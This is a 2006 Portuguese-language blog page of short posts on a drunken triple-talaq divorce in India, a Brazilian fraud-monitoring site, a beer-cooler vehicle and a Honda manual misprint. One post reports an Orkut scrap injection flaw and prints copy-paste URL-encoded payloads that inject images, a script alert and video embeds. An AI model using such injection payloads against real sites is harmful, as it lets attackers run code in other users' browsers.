sábado, 19 de agosto de 2006

Bebum diz "talaq" e perde a mulher



Mais um casal foi obrigado a se separar na Índia, após o marido, embriagado, ter pronunciado três vezes a palavra "talaq" (divórcio), como reza a tradição muçulmana.

O Código Civil indiano que regula as leis de família para os muçulmanos é muito claro: a repetição três vezes, em voz alta e com testemunhas, da palavra "talaq" é suficiente para iniciar legalmente o divórcio.

Foi isso o que fez Sheikh Ershad, um homem de 40 anos, motorista de um "rickshaw" (triciclo para o transporte público) da região de Idgamahala, no estado de Orissa, quando voltou para casa após ter se embriagado com os amigos.

O azar fez com que o "talaq, talaq, talaq" fosse escutado por várias pessoas, fazendo com que Ershad fosse obrigado a se separar de sua esposa, Najma Biwi, com a qual tem três filhos.

"Eu estava bêbado e repeti três vezes a palavra 'talaq'. O Comitê Local soube pelos vizinhos do que havia ocorrido, se reuniu e ordenou à minha esposa que arranjasse outro marido", disse ele.

Ershad teve que recorrer à Comissão Nacional de Direitos Humanos para pedir proteção e impedir que outros vizinhos se casem com sua ex-mulher.

Segundo as leis islâmicas, Biwi não pode retornar para seu marido sem antes se casar e se divorciar de outro homem, um costume chamado "Halala".

Biwi, no entanto, deixou claro que não quer se separar de seu esposo, o que não impediu os vizinhos de selecionarem um novo pretendente para ela, que se nega a aceitar as regras da sociedade.

Esta não é a primeira vez que um caso assim acontece na Índia.

Este mês, um casal, também do estado de Orissa, conseguiu voltar a se casar após terem permanecido três anos separados por um "talaq" involuntário pronunciado após outra bebedeira.

Nazma Bibi conseguiu há pouco voltar a se casar com Sher Mohammad, depois de o comitê local ter obrigado que eles se separassem, após ele ter pronunciado três vezes a palavra "talaq".

Bibi, uma mulher analfabeta com quatro filhos, travou durante os últimos três anos uma longa batalha judicial contra as autoridades locais, que chegou ao Superior Tribunal de Justiça de Orissa e mais tarde à Suprema Corte, que finalmente a autorizou a manter seu casamento.

No entanto, após três anos de luta contra os inflexíveis costumes sociais, a administração pediu ao casal que deixe a comunidade e se instale em outro lugar, "para sua própria segurança".

Copiado descaradamente do Yahoo! Brasil.

Mais no Boletim Jurídico



quinta-feira, 17 de agosto de 2006

Lista de corruptos e outras coisas do gênero



Se você, como bom cidadão consciente do seu papel, quer saber tudo sobre fraudes acesse o Monitor de Fraudes.

O site tem como objetivo informar sobre fraudes financeiras, comerciais, contábeis, contra seguros, golpes populares, lavagem de dinheiro, paraísos fiscais, corrupção no setor público e sobre as políticas e os cuidados a serem tomados para evitar problemas.

Ah, e tem a lista de corruptos que mencionei no título, que visa manter a memória histórica sobre acontecimentos, notícias e denúncias que chegaram a ser publicadas na imprensa sobre crimes ou problemas éticos relativos a políticos brasileiros de qualquer nível (desde o municipal ao federal, desde o legislativo até o executivo). Na lista dos políticos são também reportados procedimentos legais, disciplinares ou de fiscalização em andamento ou sofridos , por parte dos organismos competentes, e eventuais condenações ou sanções cominadas.

A finalidade é permitir que os eleitores possam, antes de votar, conhecer ou lembrar a história políticas de cada candidato e poder assim melhor avaliar sua idoneidade ao cargo pretendido, criando um canal para favorecer o fim da famosa "memória curta dos eleitores".




quarta-feira, 16 de agosto de 2006

Manuais em PDF



Se você é uma daquelas poucas pessoas (como eu) que lê manuais, sabe como é difícil encontrá-lo quando mais se precisa .
O UsersManualGuide é um site que reúne manuais de aparelhos eletro-eletrônicos, celulares e acessórios das marcas Motorola, Sharp, Samsung, Casio, Philips, Panasonic, Yamaha Audio, Icom e Funai.
(Nem todos estão em Português)



terça-feira, 15 de agosto de 2006

A decadência do Orkut - Por André Dahmer


Copiado descaradamente do Malvados.



Pegue carona na cerveja



A Cruzin Cooler é uma geladeira móvel que leva a cerveja e você de carona.
Com opções de motor elétrico (300 e 500 watts) ou gasolina (33 e 39cc), a "leva-bêbado" pode carregar, além do bebum propriamente dito, cerca de 25 latas de ceva mais o gelo , e mais alguns reboques pra não faltar cerveja pra ninguém.
A velocidade média fica em torno dos 25km/h e a autonomia é de 25 km e custa entre 349 e 499 dólares.
Quero ver você voltar pra casa depois de ter esvaziado a geladeira...




segunda-feira, 14 de agosto de 2006

Falha de segurança grave é encontrada no Orkut


Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.

Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.

http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%
3D%22endereco_da_imagem
%22%3E%3Ca%20style%3D%22display%3
Anone%22%20href%3D%22%3C/a%3E

*Url dividida em linhas para facilitar a vizualização

O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.


http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert
%28%22Oi!!%22%29%3c/script%3e%3ca%20style=%22
display%3anone%22%20href=%22/

*Url dividida em linhas para facilitar a vizualização


Para postar videos do YouTube:

http://www.orkut.com/%22%3e%3c/a%3e%3Cembed%
20src%3D%22http%3A//
www.youtube.com/v/ID%22%3E%3Ca%
20style%3D%22display%3
Anone%22%20href%3D%22

*Url dividida em linhas para facilitar a vizualização

Substitua o ID logo após o endereço youtube.com/v/ pelo id do endereço do vídeo no YouTube, por exemplo se o endereço do vídeo que você quer que apareça é esse: www.youtube.com/watch?v=AkmYXiaQNxs, substitua o ID por AkmYXiaQNxs .




Não nos responsabilizamos pelas conseqüências, experimente por sua conta e risco.

Copiado descaradamente do UnderGoogle.

Update: falha corrigida em menos de um dia.



domingo, 13 de agosto de 2006

Manuais da Honda com número do tele-sexo




Um erro de impressão detectado em, aproximadamente, 1,2 milhão de manuais de proprietário impressos pela Honda dos Estados Unidos está dando o que falar. O que deveria ser o número de telefone de um órgão do governo norte-americano é, na verdade, o número de contato de um tele-sexo. Segundo a Honda, em vez do prefixo 888, o que aparece escrito é o código 800, usado normalmente para identificar telefones de tele-sexo.

Ao digitar o número 1-800-918-TALK, que vem publicado no manual de modelos 2006 da Honda e da Acura, marca premium voltada para os consumidores americanos, e de motocicletas, o proprietário do carro ouvirá uma voz feminina gravada avisando que o custo da ligação é de US$ 0,99 por minuto.

Em uma carta enviada à National Highway Traffic Safety Admnistration (NHTSA), a instituição que regula a segurança viária dos EUA, a Honda comprometeu-se a encaminhar a todos os seus clientes, ainda nesse mês de agosto, um adesivo com o telefone correto para ser fixado sobre o número equivocado. De acordo com a montadora, os manuais foram impressos entre agosto de 2005 e julho de 2006.

Copiado descaradamente do Carsale.



Pesquisa personalizada

Google News - Entretenimento